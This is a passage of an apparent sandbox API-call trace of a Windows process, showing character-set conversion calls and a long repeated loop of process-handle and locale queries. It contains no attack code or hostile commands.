\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0064.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ6±\x15º\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0064.326] GetLastError () returned 0x0 [0064.326] SetLastError (dwErrCode=0x0) [0064.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0064.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젞굓ᦴJĀ") returned 256 [0064.327] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젞굓ᦴJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0064.327] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ젞굓ᦴJĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0064.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ6±\x15º\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0064.327] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e50b) returned 0x0 [0064.328] RtlSizeHeap (HeapHandle=0x2630000, Flags=0x0, MemoryPointer=0x2632b20) returned 0x80 [0064.328] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0064.328] GetCurrentProcess () returned 0xffffffff [0064.328] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.328] GetSystemDefaultLangID () returned 0x230409 [0064.329] GetThreadLocale () returned 0x409 [0064.329] GetCurrentProcess () returned 0xffffffff [0064.329] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.329] GetSystemDefaultLangID () returned 0x230409 [0064.329] GetThreadLocale () returned 0x409 [0064.329] GetCurrentProcess () returned 0xffffffff [0064.329] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.329] GetSystemDefaultLangID () returned 0x230409 [0064.329] GetThreadLocale () returned 0x409 [0064.329] GetCurrentProcess () returned 0xffffffff [0064.329] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.329] GetSystemDefaultLangID () returned 0x230409 [0064.329] GetThreadLocale () returned 0x409 [0064.329] GetCurrentProcess () returned 0xffffffff [0064.329] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.329] GetSystemDefaultLangID () returned 0x230409 [0064.329] GetThreadLocale () returned 0x409 [0064.329] GetCurrentProcess () returned 0xffffffff [0064.329] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.330] GetSystemDefaultLangID () returned 0x230409 [0064.330] GetThreadLocale () returned 0x409 [0064.330] GetCurrentProcess () returned 0xffffffff [0064.330] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.330] GetSystemDefaultLangID () returned 0x230409 [0064.330] GetThreadLocale () returned 0x409 [0064.330] GetCurrentProcess () returned 0xffffffff [0064.330] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.330] GetSystemDefaultLangID () returned 0x230409 [0064.330] GetThreadLocale () returned 0x409 [0064.330] GetCurrentProcess () returned 0xffffffff [0064.330] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.330] GetSystemDefaultLangID () returned 0x230409 [0064.330] GetThreadLocale () returned 0x409 [0064.330] GetCurrentProcess () returned 0xffffffff [0064.330] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.330] GetSystemDefaultLangID () returned 0x230409 [0064.330] GetThreadLocale () returned 0x409 [0064.330] GetCurrentProcess () returned 0xffffffff [0064.330] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.330] GetSystemDefaultLangID () returned 0x230409 [0064.330] GetThreadLocale () returned 0x409 [0064.330] GetCurrentProcess () returned 0xffffffff [0064.330] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.330] GetSystemDefaultLangID () returned 0x230409 [0064.330] GetThreadLocale () returned 0x409 [0064.330] GetCurrentProcess () returned 0xffffffff [0064.330] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.331] GetSystemDefaultLangID () returned 0x230409 [0064.331] GetThreadLocale () returned 0x409 [0064.331] GetCurrentProcess () returned 0xffffffff [0064.331] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.331] GetSystemDefaultLangID () returned 0x230409 [0064.331] GetThreadLocale () returned 0x409 [0064.331] GetCurrentProcess () returned 0xffffffff [0064.331] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.331] GetSystemDefaultLangID () returned 0x230409 [0064.331] GetThreadLocale () returned 0x409 [0064.331] GetCurrentProcess () returned 0xffffffff [0064.331] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.331] GetSystemDefaultLangID () returned 0x230409 [0064.331] GetThreadLocale () returned 0x409 [0064.331] GetCurrentProcess () returned 0xffffffff [0064.331] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.331] GetSystemDefaultLangID () returned 0x230409 [0064.331] GetThreadLocale () returned 0x409 [0064.331] GetCurrentProcess () returned 0xffffffff [0064.331] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.331] GetSystemDefaultLangID () returned 0x230409 [0064.331] GetThreadLocale () returned 0x409 [0064.331] GetCurrentProcess () returned 0xffffffff [0064.331] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.331] GetSystemDefaultLangID () returned 0x230409 [0064.331] GetThreadLocale () returned 0x409 [0064.331] GetCurrentProcess () returned 0xffffffff [0064.332] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.332] GetSystemDefaultLangID () returned 0x230409 [0064.332] GetThreadLocale () returned 0x409 [0064.332] GetCurrentProcess () returned 0xffffffff [0064.332] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.332] GetSystemDefaultLangID () returned 0x230409 [0064.332] GetThreadLocale () returned 0x409 [0064.332] GetCurrentProcess () returned 0xffffffff [0064.334] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.335] GetSystemDefaultLangID () returned 0x230409 [0064.335] GetThreadLocale () returned 0x409 [0064.335] GetCurrentProcess () returned 0xffffffff [0064.335] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.335] GetSystemDefaultLangID () returned 0x230409 [0064.335] GetThreadLocale () returned 0x409 [0064.335] GetCurrentProcess () returned 0xffffffff [0064.335] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.335] GetSystemDefaultLangID () returned 0x230409 [0064.335] GetThreadLocale () returned 0x409 [0064.335] GetCurrentProcess () returned 0xffffffff [0064.335] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.335] GetSystemDefaultLangID () returned 0x230409 [0064.335] GetThreadLocale () returned 0x409 [0064.335] GetCurrentProcess () returned 0xffffffff [0064.335] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.335] GetSystemDefaultLangID () returned 0x230409 [0064.335] GetThreadLocale () returned 0x409 [0064.335] GetCurrentProcess () returned 0xffffffff [0064.335] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.335] GetSystemDefaultLangID () returned 0x230409 [0064.335] GetThreadLocale () returned 0x409 [0064.335] GetCurrentProcess () returned 0xffffffff [0064.335] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.336] GetSystemDefaultLangID () returned 0x230409 [0064.336] GetThreadLocale () returned 0x409 [0064.336] GetCurrentProcess () returned 0xffffffff [0064.336] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.336] GetSystemDefaultLangID () returned 0x230409 [0064.336] GetThreadLocale () returned 0x409 [0064.336] GetCurrentProcess () returned 0xffffffff [0064.336] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.336] GetSystemDefaultLangID () returned 0x230409 [0064.336] GetThreadLocale () returned 0x409 [0064.336] GetCurrentProcess () returned 0xffffffff [0064.336] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.336] GetSystemDefaultLangID () returned 0x230409 [0064.336] GetThreadLocale () returned 0x409 [0064.336] GetCurrentProcess () returned 0xffffffff [0064.336] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.336] GetSystemDefaultLangID () returned 0x230409 [0064.336] GetThreadLocale () returned 0x409 [0064.336] GetCurrentProcess () returned 0xffffffff [0064.336] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.336] GetSystemDefaultLangID () returned 0x230409 [0064.336] GetThreadLocale () returned 0x409 [0064.336] GetCurrentProcess () returned 0xffffffff [0064.336] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.337] GetSystemDefaultLangID () returned 0x230409 [0064.337] GetThreadLocale () returned 0x409 [0064.337] GetCurrentProcess () returned 0xffffffff [0064.337] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.337] GetSystemDefaultLangID () returned 0x230409 [0064.337] GetThreadLocale () returned 0x409 [0064.337] GetCurrentProcess () returned 0xffffffff [0064.337] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.337] GetSystemDefaultLangID () returned 0x230409 [0064.337] GetThreadLocale () returned 0x409 [0064.337] GetCurrentProcess () returned 0xffffffff [0064.337] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.337] GetSystemDefaultLangID () returned 0x230409 [0064.337] GetThreadLocale () returned 0x409 [0064.337] GetCurrentProcess () returned 0xffffffff [0064.337] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.337] GetSystemDefaultLangID () returned 0x230409 [0064.337] GetThreadLocale () returned 0x409 [0064.337] GetCurrentProcess () returned 0xffffffff [0064.337] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.337] GetSystemDefaultLangID () returned 0x230409 [0064.337] GetThreadLocale () returned 0x409 [0064.337] GetCurrentProcess () returned 0xffffffff [0064.337] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.337] GetSystemDefaultLangID () returned 0x230409 [0064.338] GetThreadLocale () returned 0x409 [0064.338] GetCurrentProcess () returned 0xffffffff [0064.338] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.338] GetSystemDefaultLangID () returned 0x230409 [0064.338] GetThreadLocale () returned 0x409 [0064.338] GetCurrentProcess () returned 0xffffffff [0064.338] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.338] GetSystemDefaultLangID () returned 0x230409 [0064.338] GetThreadLocale () returned 0x409 [0064.338] GetCurrentProcess () returned 0xffffffff [0064.338] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.338] GetSystemDefaultLangID () returned 0x230409 [0064.338] GetThreadLocale () returned 0x409 [0064.338] GetCurrentProcess () returned 0xffffffff [0064.338] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.338] GetSystemDefaultLangID () returned 0x230409 [0064.338] GetThreadLocale () returned 0x409 [0064.338] GetCurrentProcess () returned 0xffffffff [0064.338] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.338] GetSystemDefaultLangID () returned 0x230409 [0064.338] GetThreadLocale () returned 0x409 [0064.338] GetCurrentProcess () returned 0xffffffff [0064.338] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.339] GetSystemDefaultLangID () returned 0x230409 [0064.339] GetThreadLocale () returned 0x409 [0064.339] GetCurrentProcess () returned 0xffffffff [0064.339] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.339] GetSystemDefaultLangID () returned 0x230409 [0064.339] GetThreadLocale () returned 0x409 [0064.339] GetCurrentProcess () returned 0xffffffff [0064.339] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.339] GetSystemDefaultLangID () returned 0x230409 [0064.339] GetThreadLocale () returned 0x409 [0064.339] GetCurrentProcess () returned 0xffffffff [0064.339] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.339] GetSystemDefaultLangID () returned 0x230409 [0064.339] GetThreadLocale () returned 0x409 [0064.339] GetCurrentProcess () returned 0xffffffff [0064.339] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.339] GetSystemDefaultLangID () returned 0x230409 [0064.339] GetThreadLocale () returned 0x409 [0064.339] GetCurrentProcess () returned 0xffffffff [0064.339] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.339] GetSystemDefaultLangID () returned 0x230409 [0064.339] GetThreadLocale () returned 0x409 [0064.339] GetCurrentProcess () returned 0xffffffff [0064.339] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.339] GetSystemDefaultLangID () returned 0x230409 [0064.340] GetThreadLocale () returned 0x409 [0064.340] GetCurrentProcess () returned 0xffffffff [0064.340] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.340] GetSystemDefaultLangID () returned 0x230409 [0064.340] GetThreadLocale () returned 0x409 [0064.340] GetCurrentProcess () returned 0xffffffff [0064.340] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.340] GetSystemDefaultLangID () returned 0x230409 [0064.340] GetThreadLocale () returned 0x409 [0064.340] GetCurrentProcess () returned 0xffffffff [0064.340] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.340] GetSystemDefaultLangID () returned 0x230409 [0064.340] GetThreadLocale () returned 0x409 [0064.340] GetCurrentProcess () returned 0xffffffff [0064.340] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.340] GetSystemDefaultLangID () returned 0x230409 [0064.340] GetThreadLocale () returned 0x409 [0064.340] GetCurrentProcess () returned 0xffffffff [0064.340] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.340] GetSystemDefaultLangID () returned 0x230409 [0064.340] GetThreadLocale () returned 0x409 [0064.340] GetCurrentProcess () returned 0xffffffff [0064.340] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.340] GetSystemDefaultLangID () returned 0x230409 [0064.340] GetThreadLocale () returned 0x409 [0064.340] GetCurrentProcess () returned 0xffffffff [0064.341] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.341] GetSystemDefaultLangID () returned 0x230409 [0064.341] GetThreadLocale () returned 0x409 [0064.341] GetCurrentProcess () returned 0xffffffff [0064.341] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.341] GetSystemDefaultLangID () returned 0x230409 [0064.341] GetThreadLocale () returned 0x409 [0064.341] GetCurrentProcess () returned 0xffffffff [0064.341] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.341] GetSystemDefaultLangID () returned 0x230409 [0064.341] GetThreadLocale () returned 0x409 [0064.341] GetCurrentProcess () returned 0xffffffff [0064.341] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.341] GetSystemDefaultLangID () returned 0x230409 [0064.341] GetThreadLocale () returned 0x409 [0064.341] GetCurrentProcess () returned 0xffffffff [0064.341] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.341] GetSystemDefaultLangID () returned 0x230409 [0064.341] GetThreadLocale () returned 0x409 [0064.341] GetCurrentProcess () returned 0xffffffff [0064.341] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.341] GetSystemDefaultLangID () returned 0x230409 [0064.341] GetThreadLocale () returned 0x409 [0064.341] GetCurrentProcess () returned 0xffffffff [0064.341] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.341] GetSystemDefaultLangID () returned 0x230409 [0064.341] GetThreadLocale () returned 0x409 [0064.342] GetCurrentProcess () returned 0xffffffff [0064.342] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.342] GetSystemDefaultLangID () returned 0x230409 [0064.342] GetThreadLocale () returned 0x409 [0064.342] GetCurrentProcess () returned 0xffffffff [0064.342] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.342] GetSystemDefaultLangID () 